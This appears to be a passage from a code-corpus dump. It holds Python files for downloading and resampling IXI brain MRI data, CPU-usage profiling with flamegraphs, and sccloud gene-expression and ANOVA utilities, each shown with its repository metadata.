t2_exists = len(glob.glob('./orig/t2/{}*.nii.gz'.format(IXI_id)))
pd_exists = len(glob.glob('./orig/pd/{}*.nii.gz'.format(IXI_id)))
mra_exists = len(glob.glob('./orig/mra/{}*.nii.gz'.format(IXI_id)))
# Check if each entry is complete and drop if not
# if not t1_exists and not t2_exists and not pd_exists and not mra
# exists:
if not (t1_exists and t2_exists and pd_exists and mra_exists):
df.drop(index, inplace=True)
# Write to csv file
df.to_csv('demographic_HH.csv', index=False)
if RESAMPLE_IMAGES:
# Resample the IXI HH T2 images to 1mm isotropic and reslice all
# others to it
df = pd.read_csv('demographic_HH.csv', dtype=object, keep_default_na=False,
na_values=[]).as_matrix()
for i in df:
IXI_id = i[0]
print('Resampling {}'.format(IXI_id))
t1_fn = glob.glob('./orig/t1/{}*.nii.gz'.format(IXI_id))[0]
t2_fn = glob.glob('./orig/t2/{}*.nii.gz'.format(IXI_id))[0]
pd_fn = glob.glob('./orig/pd/{}*.nii.gz'.format(IXI_id))[0]
mra_fn = glob.glob('./orig/mra/{}*.nii.gz'.format(IXI_id))[0]
t1 = sitk.ReadImage(t1_fn)
t2 = sitk.ReadImage(t2_fn)
pd = sitk.ReadImage(pd_fn)
mra = sitk.ReadImage(mra_fn)
# Resample to 1mm isotropic resolution
t2_1mm = resample_image(t2)
t1_1mm = reslice_image(t1, t2_1mm)
pd_1mm = reslice_image(pd, t2_1mm)
mra_1mm = reslice_image(mra, t2_1mm)
output_dir = os.path.join('./1mm/', IXI_id)
if not os.path.exists(output_dir):
os.makedirs(output_dir)
print('T1: {} {}'.format(t1_1mm.GetSize(), t1_1mm.GetSpacing()))
print('T2: {} {}'.format(t2_1mm.GetSize(), t2_1mm.GetSpacing()))
print('PD: {} {}'.format(pd_1mm.GetSize(), pd_1mm.GetSpacing()))
print('MRA: {} {}'.format(mra_1mm.GetSize(), mra_1mm.GetSpacing()))
sitk.WriteImage(t1_1mm, os.path.join(output_dir, 'T1_1mm.nii.gz'))
sitk.WriteImage(t2_1mm, os.path.join(output_dir, 'T2_1mm.nii.gz'))
sitk.WriteImage(pd_1mm, os.path.join(output_dir, 'PD_1mm.nii.gz'))
sitk.WriteImage(mra_1mm, os.path.join(output_dir, 'MRA_1mm.nii.gz'))
# Resample to 2mm isotropic resolution
t2_2mm = resample_image(t2, out_spacing=[2.0, 2.0, 2.0])
t1_2mm = reslice_image(t1, t2_2mm)
pd_2mm = reslice_image(pd, t2_2mm)
mra_2mm = reslice_image(mra, t2_2mm)
output_dir = os.path.join('./2mm/', IXI_id)
if not os.path.exists(output_dir):
os.makedirs(output_dir)
print('T1: {} {}'.format(t2_2mm.GetSize(), t1_2mm.GetSpacing()))
print('T2: {} {}'.format(t2_2mm.GetSize(), t2_2mm.GetSpacing()))
print('PD: {} {}'.format(pd_2mm.GetSize(), pd_2mm.GetSpacing()))
print('MRA: {} {}'.format(mra_2mm.GetSize(), mra_2mm.GetSpacing()))
sitk.WriteImage(t1_2mm, os.path.join(output_dir, 'T1_2mm.nii.gz'))
sitk.WriteImage(t2_2mm, os.path.join(output_dir, 'T2_2mm.nii.gz'))
sitk.WriteImage(pd_2mm, os.path.join(output_dir, 'PD_2mm.nii.gz'))
sitk.WriteImage(mra_2mm, os.path.join(output_dir, 'MRA_2mm.nii.gz'))
if CLEAN_UP:
# Remove the .tar files
for key, fname in fnames.items():
if (fname.endswith('.tar')):
os.remove(fname)
# Remove all data in original resolution
os.system('rm -rf orig')
| 35.852941
| 92
| 0.649439
|
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
from future.standard_library import install_aliases
install_aliases()
from urllib.request import FancyURLopener
import os.path
import tarfile
import pandas as pd
import glob
import SimpleITK as sitk
import numpy as np
DOWNLOAD_IMAGES = True
EXTRACT_IMAGES = True
PROCESS_OTHER = True
RESAMPLE_IMAGES = True
CLEAN_UP = True
def resample_image(itk_image, out_spacing=(1.0, 1.0, 1.0), is_label=False):
original_spacing = itk_image.GetSpacing()
original_size = itk_image.GetSize()
out_size = [int(np.round(original_size[0]*(original_spacing[0]/out_spacing[0]))),
int(np.round(original_size[1]*(original_spacing[1]/out_spacing[1]))),
int(np.round(original_size[2]*(original_spacing[2]/out_spacing[2])))]
resample = sitk.ResampleImageFilter()
resample.SetOutputSpacing(out_spacing)
resample.SetSize(out_size)
resample.SetOutputDirection(itk_image.GetDirection())
resample.SetOutputOrigin(itk_image.GetOrigin())
resample.SetTransform(sitk.Transform())
resample.SetDefaultPixelValue(itk_image.GetPixelIDValue())
if is_label:
resample.SetInterpolator(sitk.sitkNearestNeighbor)
else:
resample.SetInterpolator(sitk.sitkBSpline)
return resample.Execute(itk_image)
def reslice_image(itk_image, itk_ref, is_label=False):
resample = sitk.ResampleImageFilter()
resample.SetReferenceImage(itk_ref)
if is_label:
resample.SetInterpolator(sitk.sitkNearestNeighbor)
else:
resample.SetInterpolator(sitk.sitkBSpline)
return resample.Execute(itk_image)
urls = {}
urls['t1'] = 'http://biomedic.doc.ic.ac.uk/brain-development/downloads/IXI/IXI-T1.tar'
urls['t2'] = 'http://biomedic.doc.ic.ac.uk/brain-development/downloads/IXI/IXI-T2.tar'
urls['pd'] = 'http://biomedic.doc.ic.ac.uk/brain-development/downloads/IXI/IXI-PD.tar'
urls['mra'] = 'http://biomedic.doc.ic.ac.uk/brain-development/downloads/IXI/IXI-MRA.tar'
urls['demographic'] = 'http://biomedic.doc.ic.ac.uk/brain-development/downloads/IXI/IXI.xls'
fnames = {}
fnames['t1'] = 't1.tar'
fnames['t2'] = 't2.tar'
fnames['pd'] = 'pd.tar'
fnames['mra'] = 'mra.tar'
fnames['demographic'] = 'demographic.xls'
if DOWNLOAD_IMAGES:
for key, url in urls.items():
if not os.path.isfile(fnames[key]):
print('Downloading {} from {}'.format(fnames[key], url))
curr_file = FancyURLopener()
curr_file.retrieve(url, fnames[key])
else:
print('File {} already exists. Skipping download.'.format(
fnames[key]))
if EXTRACT_IMAGES:
for key, fname in fnames.items():
if (fname.endswith('.tar')):
print('Extracting IXI HH data from {}.'.format(fnames[key]))
output_dir = os.path.join('./orig/', key)
if not os.path.exists(output_dir):
os.makedirs(output_dir)
t = tarfile.open(fname, 'r')
for member in t.getmembers():
if '-HH-' in member.name:
t.extract(member, output_dir)
if PROCESS_OTHER:
xls = pd.ExcelFile('demographic.xls')
print(xls.sheet_names)
df = xls.parse('Table')
for index, row in df.iterrows():
IXI_id = 'IXI{:03d}'.format(row['IXI_ID'])
df.loc[index, 'IXI_ID'] = IXI_id
t1_exists = len(glob.glob('./orig/t1/{}*.nii.gz'.format(IXI_id)))
t2_exists = len(glob.glob('./orig/t2/{}*.nii.gz'.format(IXI_id)))
pd_exists = len(glob.glob('./orig/pd/{}*.nii.gz'.format(IXI_id)))
mra_exists = len(glob.glob('./orig/mra/{}*.nii.gz'.format(IXI_id)))
if not (t1_exists and t2_exists and pd_exists and mra_exists):
df.drop(index, inplace=True)
df.to_csv('demographic_HH.csv', index=False)
if RESAMPLE_IMAGES:
df = pd.read_csv('demographic_HH.csv', dtype=object, keep_default_na=False,
na_values=[]).as_matrix()
for i in df:
IXI_id = i[0]
print('Resampling {}'.format(IXI_id))
t1_fn = glob.glob('./orig/t1/{}*.nii.gz'.format(IXI_id))[0]
t2_fn = glob.glob('./orig/t2/{}*.nii.gz'.format(IXI_id))[0]
pd_fn = glob.glob('./orig/pd/{}*.nii.gz'.format(IXI_id))[0]
mra_fn = glob.glob('./orig/mra/{}*.nii.gz'.format(IXI_id))[0]
t1 = sitk.ReadImage(t1_fn)
t2 = sitk.ReadImage(t2_fn)
pd = sitk.ReadImage(pd_fn)
mra = sitk.ReadImage(mra_fn)
t2_1mm = resample_image(t2)
t1_1mm = reslice_image(t1, t2_1mm)
pd_1mm = reslice_image(pd, t2_1mm)
mra_1mm = reslice_image(mra, t2_1mm)
output_dir = os.path.join('./1mm/', IXI_id)
if not os.path.exists(output_dir):
os.makedirs(output_dir)
print('T1: {} {}'.format(t1_1mm.GetSize(), t1_1mm.GetSpacing()))
print('T2: {} {}'.format(t2_1mm.GetSize(), t2_1mm.GetSpacing()))
print('PD: {} {}'.format(pd_1mm.GetSize(), pd_1mm.GetSpacing()))
print('MRA: {} {}'.format(mra_1mm.GetSize(), mra_1mm.GetSpacing()))
sitk.WriteImage(t1_1mm, os.path.join(output_dir, 'T1_1mm.nii.gz'))
sitk.WriteImage(t2_1mm, os.path.join(output_dir, 'T2_1mm.nii.gz'))
sitk.WriteImage(pd_1mm, os.path.join(output_dir, 'PD_1mm.nii.gz'))
sitk.WriteImage(mra_1mm, os.path.join(output_dir, 'MRA_1mm.nii.gz'))
t2_2mm = resample_image(t2, out_spacing=[2.0, 2.0, 2.0])
t1_2mm = reslice_image(t1, t2_2mm)
pd_2mm = reslice_image(pd, t2_2mm)
mra_2mm = reslice_image(mra, t2_2mm)
output_dir = os.path.join('./2mm/', IXI_id)
if not os.path.exists(output_dir):
os.makedirs(output_dir)
print('T1: {} {}'.format(t2_2mm.GetSize(), t1_2mm.GetSpacing()))
print('T2: {} {}'.format(t2_2mm.GetSize(), t2_2mm.GetSpacing()))
print('PD: {} {}'.format(pd_2mm.GetSize(), pd_2mm.GetSpacing()))
print('MRA: {} {}'.format(mra_2mm.GetSize(), mra_2mm.GetSpacing()))
sitk.WriteImage(t1_2mm, os.path.join(output_dir, 'T1_2mm.nii.gz'))
sitk.WriteImage(t2_2mm, os.path.join(output_dir, 'T2_2mm.nii.gz'))
sitk.WriteImage(pd_2mm, os.path.join(output_dir, 'PD_2mm.nii.gz'))
sitk.WriteImage(mra_2mm, os.path.join(output_dir, 'MRA_2mm.nii.gz'))
if CLEAN_UP:
for key, fname in fnames.items():
if (fname.endswith('.tar')):
os.remove(fname)
os.system('rm -rf orig')
| true
| true
|
f7190ba74292947809c2128ff0aaecac93157a21
| 815
|
py
|
Python
|
src/configs/model_id_opts.py
|
rgalhama/public_ICCM2021
|
6a528a26c649da0843b7acbc785aa99b80d29a74
|
[
"MIT"
] | null | null | null |
src/configs/model_id_opts.py
|
rgalhama/public_ICCM2021
|
6a528a26c649da0843b7acbc785aa99b80d29a74
|
[
"MIT"
] | null | null | null |
src/configs/model_id_opts.py
|
rgalhama/public_ICCM2021
|
6a528a26c649da0843b7acbc785aa99b80d29a74
|
[
"MIT"
] | null | null | null |
"""
Author : Raquel G. Alhama
Desc:
"""
def strid_to_opts(strid):
"""
Given model id as string, extract parameter dictionary.
Reverse of config_loader.opts2strid
:param strid:
:return:
"""
raise NotImplementedError
#Method not finished
parts = strid.split("_")
param_keys=",".split("thr,win,dim,neg,dim,size,eig,neg,dyn,cds") #finish
d={}
for i,part in enumerate(parts):
if part == 'post':
pass
elif part in param_keys:
if i<len(parts) and not parts[i+1] not in param_keys:
k=part
v=parts[i+1]
d[k]=v
else: #key without value
k=part
v=1
d[k]=v
else: #value
pass
return d
# for p in parts:
| 22.638889
| 76
| 0.516564
|
def strid_to_opts(strid):
raise NotImplementedError
parts = strid.split("_")
param_keys=",".split("thr,win,dim,neg,dim,size,eig,neg,dyn,cds")
d={}
for i,part in enumerate(parts):
if part == 'post':
pass
elif part in param_keys:
if i<len(parts) and not parts[i+1] not in param_keys:
k=part
v=parts[i+1]
d[k]=v
else:
k=part
v=1
d[k]=v
else:
pass
return d
| true
| true
|
f7190ed8730fa9282a09a7f7c60f4b60d4d29e2d
| 3,453
|
py
|
Python
|
hotelReservation/scripts/cpu_breakdown.py
|
Romero027/DeathStarBench
|
185b61851b7a89277c0c2c1845e18776a9dd7201
|
[
"Apache-2.0"
] | null | null | null |
hotelReservation/scripts/cpu_breakdown.py
|
Romero027/DeathStarBench
|
185b61851b7a89277c0c2c1845e18776a9dd7201
|
[
"Apache-2.0"
] | null | null | null |
hotelReservation/scripts/cpu_breakdown.py
|
Romero027/DeathStarBench
|
185b61851b7a89277c0c2c1845e18776a9dd7201
|
[
"Apache-2.0"
] | null | null | null |
import re
import subprocess
import argparse
import statistics
from pathlib import Path
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('--proxy', type=str, default='tcp', help='proxy type (none, tcp, http or grpc)')
parser.add_argument('--app', type=str, help='the name of the application', required=True)
parser.add_argument("-v", "--verbose", action="store_true", help="print the command executed (for debugging purposes)")
return parser.parse_args()
def get_virtual_cores():
print("Running mpstat...")
cpu_util = []
for i in range(3):
cmd = ['mpstat', '1', '15']
# print("Running cmd: " + " ".join(cmd))
output = {}
result = subprocess.run(cmd, stdout=subprocess.PIPE)
result_average = result.stdout.decode("utf-8").split('\n')[-2].split()
overall = 100.00 - float(result_average[-1])
cpu_util.append(overall)
virtual_cores = statistics.mean(cpu_util)*0.64
print("Virutal Cores Usage: " + str(virtual_cores))
return virtual_cores
def get_cpu_percentage(target):
with open("./result/profile.svg", 'r') as fp:
lines = fp.readlines()
sum = 0.0
for line in lines:
if target in line:
# print(line)
l = re.findall(r"\d+\.\d+", line)
# print(l)
sum += float(l[0])
return sum
def generate_flamegraph():
print("Generating Flamegraph...")
cmd1 = ['python3', './profile.py', '-F 99', '-f', '30']
print("Running cmd: " + " ".join(cmd1))
with open("./result/out.profile-folded", "wb") as outfile1:
result = subprocess.run(cmd1, stdout=outfile1)
cmd2 = ['./flamegraph.pl', './result/out.profile-folded']
print("Running cmd: " + " ".join(cmd2))
with open("./result/profile_nosm.svg", "wb") as outfile2:
result = subprocess.run(cmd2, stdout=outfile2)
def get_cpu_breakdown(virtual_cores, proxy, app):
print("Caculating CPU breakdown...")
breakdown = {}
if proxy != "none":
breakdown['read'] = virtual_cores*get_cpu_percentage(">readv (")*0.01
breakdown['loopback'] = virtual_cores*get_cpu_percentage(">process_backlog (")*0.01
breakdown['write'] = virtual_cores*get_cpu_percentage(">writev (")*0.01 - breakdown['loopback']
breakdown['epoll'] = virtual_cores*get_cpu_percentage(">epoll_wait (")*0.01
breakdown['envoy'] = virtual_cores*get_cpu_percentage(">wrk:worker_0 (")*0.01+virtual_cores*get_cpu_percentage(">wrk:worker_1 (")*0.01
breakdown['envoy'] = breakdown['envoy']-(breakdown['read']+breakdown['write']+breakdown['loopback']+breakdown['epoll'])
breakdown['app'] = virtual_cores*get_cpu_percentage(">"+app+" (")*0.01
if proxy == 'http' or proxy =='grpc':
breakdown['http'] = virtual_cores*get_cpu_percentage(">Envoy::Network::FilterManagerImpl::onContinueReading(")*0.01
if proxy != "none":
breakdown['others'] = virtual_cores-(breakdown['read']+breakdown['write']+breakdown['loopback']+breakdown['epoll']+breakdown['envoy']+breakdown['app'])
else:
breakdown['others'] = virtual_cores-breakdown['app']
return breakdown
if __name__ == '__main__':
args = parse_args()
Path("./result").mkdir(parents=True, exist_ok=True)
virtual_cores = get_virtual_cores()
generate_flamegraph()
breakdown = get_cpu_breakdown(virtual_cores, args.proxy, args.app)
print(breakdown)
| 40.151163
| 159
| 0.645526
|
import re
import subprocess
import argparse
import statistics
from pathlib import Path
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('--proxy', type=str, default='tcp', help='proxy type (none, tcp, http or grpc)')
parser.add_argument('--app', type=str, help='the name of the application', required=True)
parser.add_argument("-v", "--verbose", action="store_true", help="print the command executed (for debugging purposes)")
return parser.parse_args()
def get_virtual_cores():
print("Running mpstat...")
cpu_util = []
for i in range(3):
cmd = ['mpstat', '1', '15']
output = {}
result = subprocess.run(cmd, stdout=subprocess.PIPE)
result_average = result.stdout.decode("utf-8").split('\n')[-2].split()
overall = 100.00 - float(result_average[-1])
cpu_util.append(overall)
virtual_cores = statistics.mean(cpu_util)*0.64
print("Virutal Cores Usage: " + str(virtual_cores))
return virtual_cores
def get_cpu_percentage(target):
with open("./result/profile.svg", 'r') as fp:
lines = fp.readlines()
sum = 0.0
for line in lines:
if target in line:
l = re.findall(r"\d+\.\d+", line)
sum += float(l[0])
return sum
def generate_flamegraph():
print("Generating Flamegraph...")
cmd1 = ['python3', './profile.py', '-F 99', '-f', '30']
print("Running cmd: " + " ".join(cmd1))
with open("./result/out.profile-folded", "wb") as outfile1:
result = subprocess.run(cmd1, stdout=outfile1)
cmd2 = ['./flamegraph.pl', './result/out.profile-folded']
print("Running cmd: " + " ".join(cmd2))
with open("./result/profile_nosm.svg", "wb") as outfile2:
result = subprocess.run(cmd2, stdout=outfile2)
def get_cpu_breakdown(virtual_cores, proxy, app):
print("Caculating CPU breakdown...")
breakdown = {}
if proxy != "none":
breakdown['read'] = virtual_cores*get_cpu_percentage(">readv (")*0.01
breakdown['loopback'] = virtual_cores*get_cpu_percentage(">process_backlog (")*0.01
breakdown['write'] = virtual_cores*get_cpu_percentage(">writev (")*0.01 - breakdown['loopback']
breakdown['epoll'] = virtual_cores*get_cpu_percentage(">epoll_wait (")*0.01
breakdown['envoy'] = virtual_cores*get_cpu_percentage(">wrk:worker_0 (")*0.01+virtual_cores*get_cpu_percentage(">wrk:worker_1 (")*0.01
breakdown['envoy'] = breakdown['envoy']-(breakdown['read']+breakdown['write']+breakdown['loopback']+breakdown['epoll'])
breakdown['app'] = virtual_cores*get_cpu_percentage(">"+app+" (")*0.01
if proxy == 'http' or proxy =='grpc':
breakdown['http'] = virtual_cores*get_cpu_percentage(">Envoy::Network::FilterManagerImpl::onContinueReading(")*0.01
if proxy != "none":
breakdown['others'] = virtual_cores-(breakdown['read']+breakdown['write']+breakdown['loopback']+breakdown['epoll']+breakdown['envoy']+breakdown['app'])
else:
breakdown['others'] = virtual_cores-breakdown['app']
return breakdown
if __name__ == '__main__':
args = parse_args()
Path("./result").mkdir(parents=True, exist_ok=True)
virtual_cores = get_virtual_cores()
generate_flamegraph()
breakdown = get_cpu_breakdown(virtual_cores, args.proxy, args.app)
print(breakdown)
| true
| true
|
f7190f849149f54de70d0c91038ddc9c7fabd157
| 10,482
|
py
|
Python
|
sccloud/misc/misc.py
|
klarman-cell-observatory/scCloud.py
|
5a04a2f22574db044d018656ac4705ec83840226
|
[
"BSD-3-Clause"
] | 3
|
2019-07-29T12:30:28.000Z
|
2019-09-20T17:15:35.000Z
|
sccloud/misc/misc.py
|
klarman-cell-observatory/scCloud.py
|
5a04a2f22574db044d018656ac4705ec83840226
|
[
"BSD-3-Clause"
] | 3
|
2019-07-24T15:07:31.000Z
|
2019-08-29T13:57:36.000Z
|
sccloud/misc/misc.py
|
klarman-cell-observatory/scCloud.py
|
5a04a2f22574db044d018656ac4705ec83840226
|
[
"BSD-3-Clause"
] | 3
|
2019-07-24T22:50:34.000Z
|
2020-12-08T01:19:34.000Z
|
import numpy as np
import pandas as pd
from typing import List
from anndata import AnnData
from sccloud.io import read_input
def search_genes(
data: AnnData,
gene_list: List[str],
rec_key: str = "de_res",
measure: str = "percentage",
) -> pd.DataFrame:
"""Extract and display gene expressions for each cluster from an `anndata` object.
This function helps to see marker expressions in clusters via the interactive python environment.
Parameters
----------
data: ``anndata.AnnData``
Annotated data matrix containing the expression matrix and differential expression results.
gene_list: ``List[str]``
A list of gene symbols.
rec_key: ``str``, optional, default: ``"de_res"``
Keyword of DE analysis result stored in ``data.varm``.
measure : ``str``, optional, default: ``"percentage"``
Can be either ``"percentage"`` or ``"mean_logExpr"``:
* ``percentage`` shows the percentage of cells expressed the genes;
* ``mean_logExpr`` shows the mean log expression.
Returns
-------
``pandas.DataFrame``
A data frame containing marker expressions in each cluster.
Examples
--------
>>> results = scc.search_genes(adata, ['CD3E', 'CD4', 'CD8'])
"""
columns = [x for x in data.varm[rec_key].dtype.names if x.startswith(measure + ":")]
df = pd.DataFrame(data=data.varm[rec_key][columns], index=data.var_names)
return df.reindex(index=gene_list)
def search_de_genes(
    data: AnnData,
    gene_list: List[str],
    rec_key: str = "de_res",
    de_test: str = "fisher",
    de_alpha: float = 0.05,
    thre: float = 1.5,
) -> pd.DataFrame:
    """Extract and display differential expression analysis results of markers for each cluster.

    This function helps to see if markers are up or down regulated in each cluster via the interactive python environment:

    * ``++`` indicates up-regulated and fold change >= threshold;
    * ``+`` indicates up-regulated but fold change < threshold;
    * ``--`` indicates down-regulated and fold change <= 1 / threshold;
    * ``-`` indicates down-regulated but fold change > 1 / threshold;
    * ``?`` indicates not differentially expressed.

    Parameters
    ----------
    data: ``anndata.Anndata``
        Annotated data matrix containing the expression matrix and differential expression results.
    gene_list: ``List[str]``
        A list of gene symbols.
    rec_key: ``str``, optional, default: ``"de_res"``
        Keyword of DE analysis result stored in ``data.varm``.
    de_test : ``str``, optional, default: ``"fisher"``
        Differential expression test to look at, could be either ``t``, ``fisher`` or ``mwu``.
    de_alpha : ``float``, optional, default: ``0.05``
        False discovery rate.
    thre : ``float``, optional, default: ``1.5``
        Fold change threshold to determine if the marker is a strong DE (``++`` or ``--``) or weak DE (``+`` or ``-``).

    Returns
    -------
    ``pandas.DataFrame``
        A data frame containing marker differential expression results for each cluster.

    Examples
    --------
    >>> df = sccloud.misc.search_de_genes(adata, ['CD3E', 'CD4', 'CD8'], thre = 2.0)
    """
    # q-value fields of the chosen test; field names look like "<test>_qval:<cluster>".
    columns = [
        x for x in data.varm[rec_key].dtype.names if x.startswith(de_test + "_qval:")
    ]
    df_de = pd.DataFrame(data.varm[rec_key][columns], index=data.var_names)
    df_de = df_de.reindex(index=gene_list)
    # Fold-change fields: the Fisher test stores a percentage fold change,
    # the other tests store a log fold change (exponentiated below).
    columns = [
        x
        for x in data.varm[rec_key].dtype.names
        if (
            x.startswith("percentage_fold_change:")
            if de_test == "fisher"
            else x.startswith("log_fold_change:")
        )
    ]
    df_fc = pd.DataFrame(data.varm[rec_key][columns], index=data.var_names)
    df_fc = df_fc.reindex(index=gene_list)
    if de_test != "fisher":
        df_fc = np.exp(df_fc)
    # "U4" fits the longest labels ("NaN", "++", "--"); default is "?" (not DE).
    results = np.zeros((len(gene_list), len(columns)), dtype=np.dtype("U4"))
    results[:] = "?"
    results[np.isnan(df_de)] = "NaN"
    # NOTE: the order of the next four assignments is significant — the
    # strong labels ("++"/"--") deliberately overwrite the weak ones ("+"/"-").
    results[(df_de <= de_alpha).values & (df_fc > 1.0).values] = "+"
    results[(df_de <= de_alpha).values & (df_fc >= thre).values] = "++"
    results[(df_de <= de_alpha).values & (df_fc < 1.0).values] = "-"
    results[(df_de <= de_alpha).values & (df_fc <= 1.0 / thre).values] = "--"
    # Cluster label is the part of the field name after the last ":".
    clusts = [x.rpartition(":")[2] for x in columns]
    df = pd.DataFrame(data=results, index=gene_list, columns=clusts)
    return df
def show_attributes(
    input_file: str,
    show_attributes: bool,
    show_gene_attributes: bool,
    show_values_for_attributes: str,
) -> None:
    """Show data attributes. For command line use.

    Parameters
    ----------
    input_file: ``str``
        Path of the input file; opened in backed read mode (``h5ad_mode="r"``).
    show_attributes: ``bool``
        If ``True``, print the sample attribute (``obs`` column) names.
    show_gene_attributes: ``bool``
        If ``True``, print the gene attribute (``var`` column) names.
    show_values_for_attributes: ``str``
        Comma-separated sample attribute names whose unique values are printed,
        or ``None`` to print nothing.
    """
    data = read_input(input_file, h5ad_mode="r")
    if show_attributes:
        print(
            "Available sample attributes in input dataset: {0}".format(
                ", ".join(data.obs.columns.values)
            )
        )
    if show_gene_attributes:
        print(
            "Available gene attributes in input dataset: {0}".format(
                ", ".join(data.var.columns.values)
            )
        )
    # Fixed anti-idiom: original read ``if not show_values_for_attributes is None``;
    # PEP 8 prescribes ``is not None`` (same truth table, clearer intent).
    if show_values_for_attributes is not None:
        for attr in show_values_for_attributes.split(","):
            print(
                "Available values for attribute {0}: {1}.".format(
                    attr, ", ".join(np.unique(data.obs[attr]))
                )
            )
def perform_oneway_anova(
    data: AnnData,
    glist: List[str],
    restriction_vec: List[str],
    group_str: str,
    fdr_alpha: float = 0.05,
    res_key: str = None,
) -> pd.DataFrame:
    """Perform one way ANOVA on a subset of cells (restricted by restriction_vec) grouped by group_str and control FDR at fdr_alpha.

    Parameters
    ----------
    data : `anndata` object
        An `anndata` object containing the expression matrix.
    glist : `list[str]`
        A list of gene symbols.
    restriction_vec : `list[str]`
        A vector of restrictions for selecting cells. Each restriction takes the format of attr:value,value,value
    group_str : `str`
        How to group selected cells for ANOVA analysis. If group_str is for pseudotime, it has two formats. 1) 'pseudotime:time:n', which divides cells by equal pseudotime invertal; 2) 'pseudotime:size:n' divides cells by equal number of cells.
    fdr_alpha : `float`, optional (default: 0.05)
        False discovery rate.
    res_key : `str`, optional (default: None)
        Store results into data using res_key, the grouping information is stored in obs and the results is stored in uns.

    Returns
    -------
    `pandas.DataFrame`
        Results for genes that pass FDR control.

    Examples
    --------
    >>> results = misc.perform_oneway_anova(data, ['CD3E', 'CD4', 'CD8'], [], 'pseudotime:size:10')
    """
    # Lazy imports keep scipy/statsmodels optional until this function is used.
    from scipy.stats import f_oneway
    from statsmodels.stats.multitest import fdrcorrection as fdr
    # Build the boolean cell-selection mask by AND-ing every restriction.
    selected = np.ones(data.shape[0], dtype=bool)
    for rest_str in restriction_vec:
        attr, value_str = rest_str.split(":")
        values = value_str.split(",")
        selected = selected & np.isin(data.obs[attr], values)
    # Silently drop requested genes that are absent from the data.
    gene_list = np.array(glist)
    gene_list = gene_list[np.isin(gene_list, data.var_names)]
    ngene = gene_list.size
    # Materialize the selected (cells x genes) submatrix as a dense array.
    # NOTE(review): ``.toarray()`` assumes ``X`` is sparse — confirm upstream.
    newdat = data[selected, :][:, gene_list].copy()
    newdat.X = newdat.X.toarray()
    group_values = group_str.split(":")
    group_names = []
    col_names = []
    ngr = 0
    group_idx = None
    if group_values[0] == "pseudotime":
        # Format "pseudotime:<time|size>:<n>" — bin cells along pseudotime.
        assert len(group_values) == 3
        div_by = group_values[1]
        ngr = int(group_values[2])
        group_idx = np.zeros((ngr, newdat.shape[0]), dtype=bool)
        pseudotimes = newdat.obs["pseudotime"].values
        min_t = pseudotimes.min()
        max_t = pseudotimes.max()
        if div_by == "time":
            # Equal-width pseudotime intervals; the -1e-5 shift makes the first
            # half-open interval include the minimum value.
            interval = (max_t - min_t) / ngr
            left = min_t - 1e-5
            for i in range(ngr):
                right = min_t + interval * (i + 1)
                name = "({:.2f}, {:.2f}]".format(left if left >= 0 else 0.0, right)
                group_names.append(name)
                group_idx[i] = (pseudotimes > left) & (pseudotimes <= right)
                left = right
        else:
            # Equal-size bins: distribute the remainder over the first bins.
            assert div_by == "size"
            ords = np.argsort(pseudotimes)
            quotient = ords.size // ngr
            residule = ords.size % ngr
            fr = 0
            for i in range(ngr):
                to = fr + quotient + (i < residule)
                name = "[{:.2f}, {:.2f}]".format(
                    pseudotimes[ords[fr]], pseudotimes[ords[to - 1]]
                )
                group_names.append(name)
                group_idx[i][ords[fr:to]] = True
                fr = to
    else:
        # Format "attr:name~v1,v2;name2~v3,..." — group by attribute values.
        assert len(group_values) == 2
        group_attr = group_values[0]
        tmp_str = group_values[1]
        groups_str = tmp_str.split(";")
        ngr = len(groups_str)
        group_idx = np.zeros((ngr, newdat.shape[0]), dtype=bool)
        for i, gstr in enumerate(groups_str):
            name, values = gstr.split("~")
            group_names.append(name)
            group_idx[i] = np.isin(newdat.obs[group_attr], values.split(","))
    for i in range(ngr):
        print("Group {} has {} cells.".format(group_names[i], group_idx[i].sum()))
    # NOTE(review): ``np.warnings`` is a deprecated alias removed in recent
    # NumPy releases — confirm the pinned NumPy version or switch to the
    # stdlib ``warnings`` module.
    np.warnings.filterwarnings("ignore")
    # Column layout per gene: [fstat, pval, qval, g0_mean, g0_percent, g1_mean, ...].
    stats = np.zeros((ngene, 3 + ngr * 2))
    for i in range(ngene):
        arr_list = []
        for j in range(ngr):
            arr = newdat.X[group_idx[j], i]
            stats[i, 3 + j * 2] = arr.mean()
            stats[i, 3 + j * 2 + 1] = (arr > 0).sum() * 100.0 / arr.size
            arr_list.append(arr)
        stats[i, 0], stats[i, 1] = f_oneway(*arr_list)
        # f_oneway returns NaN for degenerate input (e.g. zero variance);
        # treat that as "no effect" so FDR correction still works.
        if np.isnan(stats[i, 0]):
            stats[i, 0] = 0.0
            stats[i, 1] = 1.0
    passed, stats[:, 2] = fdr(stats[:, 1])
    cols = ["fstat", "pval", "qval"]
    for i in range(ngr):
        cols.extend([group_names[i] + "_mean", group_names[i] + "_percent"])
    raw_results = pd.DataFrame(stats, columns=cols, index=gene_list)
    results = raw_results[raw_results["qval"] <= fdr_alpha]
    results = results.sort_values("qval")
    # Optionally persist: full table in ``uns`` and per-cell group labels in
    # ``obs`` (cells outside the selection are labelled "background").
    if res_key is not None:
        data.uns[res_key] = raw_results
        data.obs[res_key] = "background"
        for i in range(ngr):
            idx = np.zeros(data.shape[0], dtype=bool)
            idx[selected] = group_idx[i]
            data.obs.loc[idx, res_key] = group_names[i]
    return results
| 34.367213
| 244
| 0.592253
|
import numpy as np
import pandas as pd
from typing import List
from anndata import AnnData
from sccloud.io import read_input
def search_genes(
data: AnnData,
gene_list: List[str],
rec_key: str = "de_res",
measure: str = "percentage",
) -> pd.DataFrame:
columns = [x for x in data.varm[rec_key].dtype.names if x.startswith(measure + ":")]
df = pd.DataFrame(data=data.varm[rec_key][columns], index=data.var_names)
return df.reindex(index=gene_list)
def search_de_genes(
data: AnnData,
gene_list: List[str],
rec_key: str = "de_res",
de_test: str = "fisher",
de_alpha: float = 0.05,
thre: float = 1.5,
) -> pd.DataFrame:
columns = [
x for x in data.varm[rec_key].dtype.names if x.startswith(de_test + "_qval:")
]
df_de = pd.DataFrame(data.varm[rec_key][columns], index=data.var_names)
df_de = df_de.reindex(index=gene_list)
columns = [
x
for x in data.varm[rec_key].dtype.names
if (
x.startswith("percentage_fold_change:")
if de_test == "fisher"
else x.startswith("log_fold_change:")
)
]
df_fc = pd.DataFrame(data.varm[rec_key][columns], index=data.var_names)
df_fc = df_fc.reindex(index=gene_list)
if de_test != "fisher":
